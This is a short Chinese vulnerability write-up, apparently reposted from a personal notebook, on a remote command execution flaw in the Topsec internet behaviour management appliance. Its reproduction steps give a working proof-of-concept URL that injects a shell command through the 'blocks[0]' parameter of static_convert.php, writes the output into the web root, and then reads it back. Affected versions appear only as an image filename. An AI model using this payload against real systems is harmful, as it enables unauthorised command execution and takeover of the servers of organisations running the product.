天融信上网行为管理远程命令执行漏洞

一、漏洞简介

天融信上网行为管理系统是天融信公司凭借多年来的安全产品研发经验,为满足各行各业进行网络行为管理和内容审计的专业产品。天融信上网行为管理系统存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权。

二、影响版本

1693205859079-207fa54f-ee37-4331-9621-44209c2001e0.png

四、漏洞复现

  1. 通过POC执行命令并将命令执行结果写入1.txt文件中
http://xx.xx.xx.xx/view/IPV6/naborTable/static_convert.php?blocks[0]=||%20%20ls%20%3E%3E%20/var/www/html/1.txt%0A

1693205959764-7d9f0d26-704b-4bdb-80be-d84a7d3ad7d3.png

  1. 访问1.txt获取命令执行结果
http://xx.xx.xx.xx/1.txt

1693205998150-b9502394-9f4a-469f-bcff-8ee18f5d597e.png

更新: 2024-02-29 23:57:15
原文: https://www.yuque.com/xiaokp7/ocvun2/itebo7lea2zxwow8